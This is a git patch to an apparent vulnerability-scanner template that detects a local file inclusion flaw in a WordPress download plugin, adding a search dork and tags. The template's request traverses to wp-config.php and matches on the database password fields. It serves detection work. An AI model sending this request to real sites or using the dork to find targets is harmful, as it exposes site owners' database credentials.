From 6be4e7d1d33cdd3a4d3b7d998077ca2e82dff995 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 15 Feb 2022 16:48:20 +0530
Subject: [PATCH] Update shortcode-lfi.yaml

---
 vulnerabilities/wordpress/shortcode-lfi.yaml | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/vulnerabilities/wordpress/shortcode-lfi.yaml b/vulnerabilities/wordpress/shortcode-lfi.yaml
index 312dc91c40..6389c97e1c 100644
--- a/vulnerabilities/wordpress/shortcode-lfi.yaml
+++ b/vulnerabilities/wordpress/shortcode-lfi.yaml
@@ -5,24 +5,23 @@ info:
   author: dhiyaneshDK
   severity: high
   description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
-  reference:
-    - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
-  tags: wordpress,wp-plugin,lfi
+  reference: https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
+  metadata:
+    google-dork: inurl:wp/wp-content/force-download.php
+  tags: wordpress,wp-plugin,lfi,shortcode,wp
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp/wp-content/force-download.php?file=../wp-config.php'
       - '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'
 
-    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "DB_NAME"
           - "DB_PASSWORD"
-        part: body
         condition: and
 
       - type: status